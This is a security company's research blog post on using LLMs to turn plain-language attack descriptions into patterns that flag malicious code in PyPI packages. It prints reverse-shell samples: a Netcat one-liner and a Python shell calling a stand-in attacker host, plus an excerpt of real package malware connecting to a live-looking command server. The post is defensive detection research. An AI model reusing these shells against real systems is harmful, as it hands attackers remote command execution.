A dataset-free approach to leveraging LLMs for malicious code detection

Research, Technical

February 6 2024

Apiiro’s security and AI research team is continuously looking for new ways to leverage GenAI and LLMs to detect the new and constantly evolving threats modern applications and software supply chains face.

Our previously developed LLM Code Patterns (LCPs) methodology proved valuable in detecting malicious packages: given a reliable dataset, it recognizes patterns similar to those in known malicious packages. But it has limitations. To address them, our latest breakthrough builds on LCPs to identify malicious code patterns without depending on impossible-to-maintain datasets. In this post, we’ll walk through the challenges of our previous approach and introduce this new methodology.

Challenges with LLM Code Patterns to detect malicious code

LCPs proved very effective at surfacing malicious code based on previously known malicious code, but maintaining a dataset that encompasses every conceivable attack variant used in malicious code is an overwhelming and never-ending task.

For example, take a reverse shell attack. Its implementation can vary significantly, ranging from simple Netcat commands such as…

nc -e /bin/sh attacker_ip 21

…to more complex implementations in languages such as Python:

import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ATTACKER_IP, PORT))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])

Attempting to catalog every incarnation of this attack—let alone for every other type of attack—and maintaining an exhaustive, always-up-to-date database would be nearly impossible. To solve this challenge, we set out on a quest for a dataset-free solution.
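To make the maintenance problem concrete, here is a toy illustration of dataset-bound matching. It is not how LCPs work (they are far more capable than text comparison). It is only a minimal stand-in, assuming a hypothetical one-sample dataset and an arbitrary similarity threshold, that shows how matching against known samples depends on which variants the dataset already contains.

```python
from difflib import SequenceMatcher

# Hypothetical reference dataset holding a single known sample (the Netcat variant).
KNOWN_SAMPLES = ["nc -e /bin/sh attacker_ip 21"]

# Arbitrary cutoff chosen for this illustration only.
SIMILARITY_THRESHOLD = 0.6


def best_similarity(snippet: str) -> float:
    """Return the highest character-level similarity to any known sample."""
    return max(SequenceMatcher(None, known, snippet).ratio() for known in KNOWN_SAMPLES)


def looks_known(snippet: str) -> bool:
    """Flag a snippet only if it closely resembles a sample already in the dataset."""
    return best_similarity(snippet) >= SIMILARITY_THRESHOLD


# A near-copy of the known sample: different shell and port.
netcat_variant = "nc -e /bin/bash attacker_ip 4444"

# The same attack written in Python. The text is only compared, never executed,
# so the ATTACKER_IP and PORT placeholders stay undefined.
python_variant = """import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ATTACKER_IP, PORT))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])
"""

if __name__ == "__main__":
    for label, snippet in [("netcat variant", netcat_variant), ("python variant", python_variant)]:
        print(f"{label}: similarity={best_similarity(snippet):.2f} flagged={looks_known(snippet)}")
```

The near-copy is flagged, while the Python implementation of the same attack is not, because nothing resembling it is in the dataset. Closing that gap by adding samples is exactly the never-ending task described above.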

Introducing LLM Descriptive Patterns (LDP)

Our response to the challenge of maintaining malicious code datasets across different types of attacks, languages, and tools is called LLM Descriptive Patterns—LDP for short.

The LDP mechanism converts simple free-text descriptions of cyberattacks into coding patterns recognized by our engines. Combining our previous methodology, LLM Code Patterns (LCP), with LDP enables us not only to identify whether a code snippet executes a specific attack but also to sweep entire code repositories for potential threats described in natural language.
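The general shape of "description in, code pattern out, then scan" can be sketched in a few lines. This is not Apiiro's implementation, which is not described in this post. In this minimal sketch, the LLM translation step is replaced by a hard-coded, hypothetical lookup table (`BEHAVIOR_VOCABULARY`), and the "coding pattern" is reduced to a set of call names found with Python's standard `ast` module. All names below are assumptions made for illustration.

```python
import ast
from dataclasses import dataclass

# Hypothetical vocabulary: phrase in a description -> call names that signal that behavior.
# A real system would use an LLM for this translation; this table is a hard-coded stand-in.
BEHAVIOR_VOCABULARY = {
    "network connection": frozenset({"connect", "create_connection"}),
    "shell": frozenset({"Popen", "call", "run", "system", "check_output"}),
}


@dataclass(frozen=True)
class DescriptivePattern:
    description: str
    behaviors: tuple  # tuple of (phrase, frozenset of call names)


def describe_to_pattern(description: str) -> DescriptivePattern:
    """Stand-in for the LLM step: keep every behavior whose phrase occurs in the text."""
    text = description.lower()
    behaviors = tuple(
        (phrase, calls) for phrase, calls in BEHAVIOR_VOCABULARY.items() if phrase in text
    )
    return DescriptivePattern(description, behaviors)


def called_names(source: str) -> set:
    """Collect the trailing name of every call, e.g. 'Popen' for subprocess.Popen(...)."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            func = node.func
            if isinstance(func, ast.Attribute):
                names.add(func.attr)
            elif isinstance(func, ast.Name):
                names.add(func.id)
    return names


def matches(pattern: DescriptivePattern, source: str) -> bool:
    """A source matches only when every described behavior is present in it."""
    if not pattern.behaviors:
        return False
    names = called_names(source)
    return all(names & calls for _, calls in pattern.behaviors)


REVERSE_SHELL_DESCRIPTION = (
    "Opens an outbound network connection and runs received commands in a shell."
)

# Sample inputs; they are parsed, never executed.
suspicious_source = """
import socket, subprocess
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("host.invalid", 4444))
subprocess.Popen("id", shell=True)
"""

benign_source = """
import subprocess
subprocess.run(["ls", "-l"])
"""

if __name__ == "__main__":
    pattern = describe_to_pattern(REVERSE_SHELL_DESCRIPTION)
    print("suspicious:", matches(pattern, suspicious_source))
    print("benign:", matches(pattern, benign_source))
```

Matching on call names alone is deliberately crude and would produce false positives on real code. The point is only that the pattern is derived from a description of behavior, so no sample of a previous attack is needed to recognize a new variant.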

Real-world application of LDP

To demonstrate the power of our search engine, we analyzed thousands of PyPI packages using LDP and were able to pinpoint ones that contained fragments indicative of a reverse shell attack. Several packages, including proclean and sysversion (which are no longer available on PyPI), bore striking similarities to reverse shell implementations. The ability to detect those similarities without a reference database affirms the practical value of our tool in detecting and mitigating such threats effectively.

As can be seen in the proclean package code:

import socket
import subprocess

def reliable_send(data):
    ...

def reliable_recv():
    ...

def download_file(file_name):
    ...

def upload_file(file_name):
    f = open(file_name, 'rb')
    s.send(f.read())

def shell():
    while True:
        command = reliable_recv()
        if command == 'quit':
            break
        elif command == 'background': # BEGIN
            pass
        ...
        elif command[:5] == 'start':
            try:
                subprocess.Popen(command[6:], shell=True)
                reliable_send('[+] Started!')
        else:
            execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                                       stdin=subprocess.PIPE)
            ...
            reliable_send(result)

def connection():
    while True:
        time.sleep(5)
        try:
            s.connect(('windowupdate.ddns.net', 6007))
            shell()
            s.close()
            break
        except:
            connection()

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connection()

The snippet above, taken from the proclean package, demonstrates how Apiiro’s engine can use a natural language description of a reverse shell attack to scan for and identify similar malicious patterns within code repositories. The code connects out to a remote host in a retry loop, then runs each received command through subprocess.Popen with shell=True and sends back the result, which is the behavior of a reverse shell. Instead of searching for exact code matches, LDP interprets the intent and structure behind the natural language description to find code that behaves in the same way.

Apiiro’s innovative approach using LLM Descriptive Patterns (LDP) to identify malicious code offers significant benefits. By translating free-text descriptions of cyberattacks into recognizable coding patterns, Apiiro’s search engine can detect potential threats without relying on large, exhaustive datasets of known malicious code. Thus, LDP is more adaptable and can keep pace with the evolving nature of application and software supply chain threats. The implications of this technology extend beyond Apiiro, as it represents a shift towards more proactive and dynamic software supply chain security measures.

At Apiiro, it’s our mission to make securing development and delivery to the cloud as efficient as possible. Research like this is crucial to staying ahead of modern attack methods signaled by malicious code. Subscribe to our blog for more research or get in touch to see how Apiiro’s deep ASPM platform surfaces malicious code today.

Gil David

Head of AI

Ella Bor

Data Science Team Lead at Apiiro

Matan Giladi

Security Researcher